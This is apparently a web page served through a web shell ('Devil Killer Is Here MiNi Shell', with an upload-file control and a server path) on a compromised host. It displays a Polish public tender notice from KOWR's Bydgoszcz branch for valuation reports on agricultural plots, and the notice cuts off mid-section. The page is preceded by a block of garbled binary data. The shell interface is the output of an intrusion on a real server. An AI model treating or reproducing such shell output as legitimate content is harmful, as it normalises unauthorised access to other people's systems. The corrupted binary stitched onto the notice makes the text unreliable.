JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230622/0027101401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie operatów szacunkowych na wycenę nieruchomości, będących w Zasobie KOWR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego – 9 zadań. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Hetmańska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-039</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.bydgoszcz@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie Zasobem Własności Rolnej Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie operatów szacunkowych na wycenę nieruchomości, będących w Zasobie KOWR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego – 9 zadań. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-87a6a154-104b-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00271014</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00114321/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Sporządzenie operatów szacunkowych na wycenę nieruchomości, będących w Zasobie KOWR OT Bydgoszcz, z uwzględnieniem podziału na części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/open-preview-auction.html/399574 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://kowr.eb2b.com.pl/open-preview-auction.html/399574<br/>2. Zamawiający może komunikować się z Wykonawcami również za pomocą poczty elektronicznej, <br/>e-mail: zamowienia.publiczne.bydgoszcz@kowr.gov.pl, z poniższym zastrzeżeniem:<br/>2.1.	Zamawiający dopuszcza możliwość składania dokumentów elektronicznych lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na wskazany w pkt 2 adres mailowy – Z WYŁĄCZENIEM OFERT WRAZ Z ZAŁACZNIKAMI, KTÓRE SĄ SKŁADANE TYLKO I WYŁĄCZNIE ZA POŚREDNICTWEM PLATFORMY ZAKUPOWEJ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Ofertę sporządza się w języku polskim i składa pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>2.	Do podpisywania dokumentów w postaci elektronicznej wymagane jest posiadanie kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego. <br/>3.	Do elektronicznego podpisywania dokumentów elektronicznych przy pomocy kwalifikowanego podpisu elektronicznego stosuje się następujące formaty podpisów: XAdES, PAdES, CAdESlubASIC (Zamawiający preferuje stosowanie formatu podpisu PAdES dla plików w formacie .pdf oraz XAdES typ wewnętrzny otaczający dla plików w pozostałych dopuszczalnych formatach). UWAGA !!! W przypadku korzystania z formatu podpisu XAdES typ zewnętrzny należy pamiętać, żeby plik podpisu przekazać Zamawiającemu razem z plikiem podpisywanym.<br/>4.	Do elektronicznego podpisywania dokumentów elektronicznych przy pomocy podpisu osobistego stosuje się następujące formaty podpisów: PAdES.<br/>5.	Dokumenty elektroniczne po podpisaniu przy pomocy profilu zaufanego generowane są w formacie .xml i w takim formacie należy przesyłać je do Zamawiającego. <br/>6.	W przypadku, gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 t.j) Wykonawca w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, zgodnie z zapisami w SWZ.<br/>7.	Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <br/>8.	Szczegółowa informacja nt wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarta jest w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/ złożyły ofertę. Zamawiający informuje, że: <br/>1.	ADMINISTRATOR DANYCH OSOBOWYCH<br/>Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail: kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. <br/>2.	INSPEKTOR OCHRONY DANYCH OSOBOWYCH<br/>W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.<br/>3.	CELE I PODSTAWY PRAWNE PRZETWARZANIA DANYCH OSOBOWYCH<br/>Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.).<br/>4.	ODBIORCY DANYCH OSOBOWYCH<br/>Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 PZP.<br/>Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub kurierską.<br/>5.	OKRES PRZETWARZANIA DANYCH OSOBOWYCH <br/>Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w stosunku do niego.<br/>Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6.	INFORMACJA O WYMOGU/DOBROWOLNOŚCI PODANIA DANYCH OSOBOWYCH<br/>Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału. Ciąg dalszy informacji RODO tzn pkt 7-9 znajduje się na końcu niniejszego ogłoszenia w punkcie dotyczącym Informacji dodatkowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BYD.WOP.260.13.2023.MB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 58/4 o powierzchni 0,8100 ha, obręb Mąkoszyn, gmina Szubin, powiat nakielski. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY1U/00029735/5. Charakterystyka nieruchomości – nieruchomość niezabudowana, częściowo zadrzewiona i zakrzaczona, posiada dostęp do drogi. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego oraz nie zostały wydane decyzje o warunkach zabudowy. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Szubin, działka znajduje się na terenie, dla którego nie wskazuje się zmiany funkcji oraz charakteru zagospodarowania. Jeżeli jest użytkowany rolniczo określa się jego przeznaczenie jako tereny rolne. Działka zlokalizowana jest w jednostce planistycznej 5.3, dla której profil funkcjonalny wskazuje się funkcję dominującą – ekologiczną, a jako funkcje uzupełniającą wskazuje się rekreację i mieszkalnictwo. <br/>2.	Działka nr 45/18 o powierzchni 0,3939 ha, obręb Skórzewo, gmina Szubin, powiat nakielski. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY1U/00002229/0. Charakterystyka nieruchomości – nieruchomość rolna z częściową zabudową o charakterze rolnym nietrwale związaną z gruntem stanowiącą własność dzierżawcy, działka nie posiada dostępu do drogi. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego oraz nie zostały wydane decyzje o warunkach zabudowy. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Szubin, działka znajduje się na terenie, dla którego nie wskazuje się zmiany funkcji oraz charakteru zagospodarowania. Jeżeli jest użytkowany rolniczo określa się jego przeznaczenie jako tereny rolne. Częściowo znajdują się tam grunty pochodzenia organicznego. Pozostała, niewielka część działki, znajduje się na terenie zabudowy mieszkaniowo-usługowej, zagrodowej i gospodarczej, oraz na terenach przeznaczonych na te cele w miejscowych planach zagospodarowania przestrzennego. Wspomniana cześć działki stanowi kontynuacje istniejącej w tym obszarze zabudowy zagrodowej i służy wyłącznie celom rolniczym. Działka znajduje się w jednostce planistycznej nr 2, dla której profil funkcjonalny wskazuje się funkcję dominującą – mieszkaniową i gospodarczą, a jako uzupełniającą określa się: rolnictwo, działalność rekreacyjno-wypoczynkową i ekologię. <br/>Wykonanie – 2 operaty szacunkowe w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 171/1 o łącznej powierzchni 1,2400 ha, obręb Włościbórz, gmina Sępólno Krajeńskie, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00015592/5. Charakterystyka nieruchomości – Nieruchomość stanowi działka użytkowana rolniczo, jako grunt orny. Działka posiada dostęp do drogi publicznej, gruntowej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się <br/>w obszarze oznaczonym symbolem R1 – obszary rolne.<br/>2.	Działka nr 128/9 o łącznej powierzchni 0,0815 ha, obręb Nowy Dwór, gmina Więcbork, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00018493/2. Charakterystyka nieruchomości – Nieruchomość stanowi działka niezabudowana, teren ogródków działkowych, teren porośnięty trawami, posiada dostępu do drogi publicznej, gruntowej. Działka w całości ogrodzona. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy i miasta Więcbork działka znajduje się w jednostce 2. Jednostka podmiejska o wielofunkcyjnym charakterze. Wśród funkcji wyróżnia się funkcję mieszkaniową, gospodarczą, rolniczą i rekreacyjną. <br/>3.	Działka nr 268/7 o łącznej powierzchni 0,3000 ha, obręb Witunia, gmina Więcbork, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00026167/7. Charakterystyka nieruchomości – Nieruchomość stanowi działka niezabudowana, w sąsiedztwie znajduje się zabudowa mieszkaniowa jednorodzinna i grunty użytkowane rolniczo, teren porośnięty trawami, posiada dostępu do drogi publicznej, gruntowej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy i miasta Więcbork działka znajduje się w jednostce 2. Jednostka podmiejska o wielofunkcyjnym charakterze. Wśród funkcji wyróżnia się funkcję mieszkaniową, gospodarczą, rolniczą i rekreacyjną. <br/>4.	Działka nr 351/1 o łącznej powierzchni 0,1800 ha, obręb Witunia, gmina Więcbork, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00026166/0. Charakterystyka nieruchomości – Nieruchomość stanowi działka niezabudowana, w sąsiedztwie znajduje się zabudowa mieszkaniowa jednorodzinna i grunty użytkowane rolniczo, teren porośnięty trawami, posiada dostępu do drogi publicznej, gruntowej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy i miasta Więcbork działka znajduje się w jednostce 2. Jednostka podmiejska o wielofunkcyjnym charakterze. Wśród funkcji wyróżnia się funkcję mieszkaniową, gospodarczą, rolniczą i rekreacyjną. <br/>5.	Działka nr 247/2 o łącznej powierzchni 0,3000 ha, obręb Zakrzewska Osada, gmina Więcbork, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00031894/0. Charakterystyka nieruchomości – Nieruchomość stanowi działka niezabudowana, w sąsiedztwie znajduje się zabudowa mieszkaniowa jednorodzinna i grunty użytkowane rolniczo, teren porośnięty trawami, posiada dostępu do drogi publicznej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy i miasta Więcbork działka znajduje się w jednostce 5. Jednostka o wielofunkcyjnym charakterze. Wśród funkcji wyróżnia się funkcję mieszkaniową, rolniczą, leśną i turystyczną.<br/>6.	Działka nr 101 o łącznej powierzchni 0,3700 ha, obręb Mierucin, gmina Sośno, powiat sępoleński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY2T/00014805/5. Charakterystyka nieruchomości – Nieruchomość stanowi działka niezabudowana rolna, w sąsiedztwie znajduje grunty użytkowane rolniczo, teren porośnięty trawami, posiada dostępu do drogi publicznej, gruntowej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Według studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Sośno działka znajduje się w strefie funkcjonalno-przestrzennej B, oznaczonej jako osadniczo-rolnicza. <br/>Wykonanie – 6 operatów szacunkowych w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów 